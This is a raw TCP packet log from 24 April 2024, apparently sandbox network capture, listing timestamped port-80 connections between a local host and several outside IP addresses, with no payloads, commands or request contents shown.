                                                                                              Apr 24, 2024 07:26:27.153075933 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.153110981 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.153167009 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.153203011 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414510965 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414532900 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414546013 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414592028 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414602041 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414635897 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414644003 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414686918 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414729118 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414743900 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414830923 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414868116 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414875984 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414943933 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414992094 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.415009022 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.415052891 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.415091991 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.415121078 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.415163040 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:28.184490919 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.202815056 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.470438004 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.470596075 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.472825050 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.740849018 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740916014 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740927935 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740946054 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740959883 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.741014957 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.741149902 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951217890 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951241970 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951257944 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951309919 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951334953 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951373100 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951404095 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951417923 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951452971 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951467037 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951481104 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951517105 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951539040 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951611042 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951649904 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.218982935 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219012022 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219043016 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219108105 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219145060 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219201088 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219255924 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219280958 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219295025 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219377041 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219486952 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219568014 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219638109 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219702959 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219722986 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219767094 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219815969 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219882011 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219904900 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220015049 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220052958 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220083952 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.220097065 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220176935 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.981491089 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.000026941 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.275774956 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.275891066 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.277775049 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.552330971 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.748277903 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.748301029 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.748483896 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.751262903 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:33.025886059 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.287801027 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.606247902 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.606408119 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.608926058 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.908231974 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.908305883 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.926695108 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027081966 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027110100 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027128935 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027328014 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:48.121757984 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.140527010 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.461127043 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.461270094 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.463195086 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.759095907 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.759186029 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.780961990 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881474972 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881500006 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881544113 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.881623030 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881671906 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:50.965524912 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:51.990775108 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.308691025 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.309012890 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.311630964 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.615502119 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.615816116 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.629520893 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629568100 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629595995 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629898071 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629981995 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630063057 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630084991 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630203009 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630255938 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731326103 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731362104 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731378078 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731389046 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731481075 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.934020996 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:53.050283909 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:54.845704079 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.163733959 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.163835049 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.165807009 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.470524073 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.470688105 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.484617949 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586297035 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586327076 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586340904 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586489916 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.588921070 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.906735897 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.511817932 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:02.678076982 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.678215027 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:02.680174112 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:02.845627069 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.859771967 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.859787941 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.859877110 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:04.184303999 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.203655005 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.369210958 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.369312048 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.371216059 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.537224054 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.556513071 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.557482958 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.557550907 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:06.887800932 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:07.906342030 CEST4975280192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:28:11.266798973 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.540838003 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.540919065 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.543102026 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.817044973 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.818558931 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.818639040 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:11.818725109 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:11.821577072 CEST4976980192.168.2.4118.27.122.214
                                                                                              Apr 24, 2024 07:28:12.095594883 CEST8049769118.27.122.214192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.139041901 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:17.308581114 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.308729887 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:17.312788010 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:17.482171059 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.518404961 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.518434048 CEST804977034.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:17.520133972 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:18.825050116 CEST4977080192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:19.843231916 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:20.013865948 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.013988018 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:20.015732050 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:20.185889959 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.231172085 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.231571913 CEST804977134.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:20.231617928 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:21.528151035 CEST4977180192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.549247026 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.719080925 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.719192028 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.721571922 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:22.891149998 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891194105 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891210079 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891225100 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.891241074 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892364979 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892426014 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892517090 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.892582893 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.926213980 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.926238060 CEST804977234.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:22.926374912 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:24.231215954 CEST4977280192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.249948025 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.419554949 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.419754028 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.424794912 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.594963074 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682203054 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682255030 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682342052 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682379961 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682404995 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.682420015 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:25.682468891 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.682468891 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.687625885 CEST4977380192.168.2.434.149.87.45
                                                                                              Apr 24, 2024 07:28:25.857009888 CEST804977334.149.87.45192.168.2.4
                                                                                              Apr 24, 2024 07:28:31.825392008 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:32.182847023 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.183079958 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:32.187218904 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:32.544298887 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.545361042 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.545398951 CEST804977431.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:32.545527935 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:33.699917078 CEST4977480192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:34.718353033 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:35.075207949 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.075288057 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:35.078109980 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:35.435009003 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.435842991 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.435882092 CEST804977531.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:35.435986042 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:36.591090918 CEST4977580192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:37.610446930 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:37.965044975 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:37.967758894 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:37.980017900 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:38.334358931 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334434032 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334466934 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334500074 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334532976 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334655046 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.334705114 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.335210085 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.335297108 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.336600065 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.336637974 CEST804977631.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:38.336791039 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:39.496861935 CEST4977680192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:40.516792059 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:40.870302916 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:40.870398045 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:40.873035908 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:41.226131916 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:41.227427959 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:41.227471113 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:41.227560043 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:41.229969978 CEST4977780192.168.2.431.186.11.254
                                                                                              Apr 24, 2024 07:28:41.583481073 CEST804977731.186.11.254192.168.2.4
                                                                                              Apr 24, 2024 07:28:46.495013952 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:46.799424887 CEST804977891.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:46.799520016 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:46.802004099 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:47.119467974 CEST804977891.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:47.119534969 CEST804977891.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:47.119580030 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:48.309361935 CEST4977880192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.327888966 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.632491112 CEST804977991.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:49.633090019 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.635121107 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:49.940563917 CEST804977991.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:49.940594912 CEST804977991.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:49.940711975 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:51.137432098 CEST4977980192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.161462069 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.466085911 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.466267109 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.470910072 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:52.775405884 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775779009 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775796890 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775811911 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775830030 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775844097 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775859118 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775872946 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.775887966 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.778855085 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.778884888 CEST804978091.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:52.778929949 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:53.981200933 CEST4978080192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.000251055 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.305001974 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.305090904 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.307064056 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.652690887 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969573975 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969628096 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969669104 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969687939 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.969707966 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969748020 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969786882 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969818115 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.969851017 CEST4978180192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:28:55.969913006 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969952106 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.969989061 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.970030069 CEST804978191.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:28:55.970057964 CEST4978180192.168.2.491.195.240.19
